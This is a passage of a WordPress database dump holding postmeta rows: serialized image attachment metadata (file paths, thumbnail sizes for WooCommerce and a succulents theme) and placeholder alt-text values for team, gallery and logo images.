jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2270,2748,'_wp_attachment_image_alt','a'),(2271,2749,'_wp_attached_file','2018/02/team-member-3.jpg'),(2272,2749,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:25:\"2018/02/team-member-3.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"team-member-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"team-member-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"team-member-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"team-member-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"team-member-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"team-member-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"team-member-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"team-member-3-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"team-member-3-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"team-member-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"team-member-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2273,2749,'_wp_attachment_image_alt','a'),(2274,2753,'_wp_attached_file','2018/02/h1-img10.jpg'),(2275,2753,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:652;s:4:\"file\";s:20:\"2018/02/h1-img10.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img10-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img10-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h1-img10-1024x348.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h1-img10-768x261.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h1-img10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h1-img10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"h1-img10-1536x522.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h1-img10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"h1-img10-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h1-img10-550x652.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:652;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h1-img10-1100x652.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:652;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h1-img10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img10-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2276,2753,'_wp_attachment_image_alt','a'),(2277,2756,'_wp_attached_file','2018/02/h4-gallery-img-1.jpg'),(2278,2756,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:28:\"2018/02/h4-gallery-img-1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2279,2756,'_wp_attachment_image_alt','a'),(2280,2757,'_wp_attached_file','2018/02/h4-gallery-img-2.jpg'),(2281,2757,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:28:\"2018/02/h4-gallery-img-2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2282,2757,'_wp_attachment_image_alt','a'),(2283,2760,'_wp_attached_file','2018/02/h4-gallery-img-3.jpg'),(2284,2760,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:28:\"2018/02/h4-gallery-img-3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"h4-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h4-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2285,2760,'_wp_attachment_image_alt','a'),(2286,2763,'_wp_attached_file','2018/02/Logo-New-TR-web.png'),(2287,2763,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:603;s:6:\"height\";i:177;s:4:\"file\";s:27:\"2018/02/Logo-New-TR-web.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Logo-New-TR-web-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x177.png\";s:5:\"width\";i:550;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x177.png\";s:5:\"width\";i:550;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2288,2763,'_wp_attachment_image_alt','o'),(2289,2769,'_wp_attached_file','2018/02/small-round-logo-for-new-web.png'),(2290,2769,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:428;s:6:\"height\";i:361;s:4:\"file\";s:40:\"2018/02/small-round-logo-for-new-web.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-300x253.png\";s:5:\"width\";i:300;s:6:\"height\";i:253;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-428x300.png\";s:5:\"width\";i:428;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"small-round-logo-for-new-web-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2291,2769,'_wp_attachment_image_alt','o'),(2292,2514,'_wp_attachment_image_alt','o'),(2293,2515,'_wp_attachment_image_alt','o'),(2294,2516,'_wp_attachment_image_alt','o'),(2295,2517,'_wp_attachment_image_alt','o'),(2296,2518,'_wp_attachment_image_alt',''),(2297,2521,'_wp_attachment_image_alt','o'),(2298,2522,'_wp_attachment_image_alt','o'),(2299,2524,'_wp_attachment_image_alt','o'),(2300,2533,'_wp_attachment_image_alt','o'),(2301,2536,'_wp_attachment_image_alt','o'),(2302,2537,'_wp_attachment_image_alt',''),(2303,2538,'_wp_attachment_image_alt','o'),(2304,2539,'_wp_attachment_image_alt','o'),(2305,2540,'_wp_attachment_image_alt','o'),(2306,2541,'_wp_attachment_image_alt','o'),(2307,2542,'_wp_attachment_image_alt','o'),(2308,2544,'_wp_attachment_image_alt','o'),(2309,2592,'_wp_attachment_image_alt','o'),(2310,2612,'_wp_attachment_image_alt','o'),(2311,2613,'_wp_attachment_image_alt','o'),(2312,2742,'_wp_attachment_image_alt','a'),(2313,2745,'_wp_attachment_image_alt','a'),(2314,2746,'_wp_attachment_image_alt','a'),(2315,2747,'_wp_attachment_image_alt','a'),(2316,2748,'_wp_attachment_image_alt','a'),(2317,2749,'_wp_attachment_image_alt','a'),(2318,2753,'_wp_attachment_image_alt','a'),(2319,2756,'_wp_attachment_image_alt','a'),(2320,2757,'_wp_attachment_image_alt','a'),(2321,2760,'_wp_attachment_image_alt','a'),(2322,2763,'_wp_attachment_image_alt','o'),(2323,2769,'_wp_attachment_image_alt','o'),(2324,2773,'_wp_attached_file','2018/02/slika1.jpg'),(2325,2773,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika1-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika1-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2326,4341,'_wp_attached_file','2018/02/slika1-1.jpg'),(2327,4341,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s